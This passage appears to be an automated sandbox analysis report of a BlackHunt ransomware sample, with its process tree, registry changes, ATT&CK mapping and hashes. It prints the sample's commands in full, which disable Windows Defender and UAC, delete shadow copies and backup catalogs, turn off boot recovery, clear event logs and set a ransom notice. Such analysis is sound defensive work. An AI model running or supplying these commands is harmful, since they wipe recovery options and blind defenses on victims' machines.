344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 51 PID 1748 wrote to memory of 2712 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 51 PID 1748 wrote to memory of 2616 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 52 PID 1748 wrote to memory of 2616 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 52 PID 1748 wrote to memory of 2616 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 52 PID 1748 wrote to memory of 2616 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 52 PID 1748 wrote to memory of 2452 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 55 PID 1748 wrote to memory of 2452 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 55 PID 1748 wrote to memory of 2452 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 55 PID 1748 wrote to memory of 2452 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 55 PID 1748 wrote to memory of 2480 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 58 PID 1748 wrote to memory of 2480 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 58 PID 1748 wrote to memory of 2480 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 58 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe"C:\Users\Admin\AppData\Local\Temp\344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1748 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2956
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2616
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2788
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1504
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1084
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2812
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1060
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:784
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2508
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1816
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1764
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe" /F2⤵PID:1696
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe" /F3⤵
- Creates scheduled task(s)
PID:1840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2284
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:540
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:488
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:564
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1304
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:600
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1664
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2420
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1828
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1160
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1888
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2704
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1972
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2660
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2580
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1160
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1100
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2836
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2952
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2508
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2644
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1756
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1680
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:656
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3124
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3144
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3216
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3204
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3244
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe"2⤵
- Deletes itself
PID:3388 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3384
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3372
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3364
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2276
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2840
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2976
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51544b8f7ca16042245f6d3e0ea01e95f
SHA18c865659617b47ae8d19af1efea675450921a29a
SHA256b8c957c85019d715b5185f59750c4380d90a21600ddfdaffaa02fb7764564997
SHA512b3a52b838771d62a876390d7ecb73f102242cf5fccca9eade5a9f616c476e0e60a15421150c74283aab3a258d1b91cf82ac95317a9c7caa07943b8844b7abdb3
-
Filesize
12KB
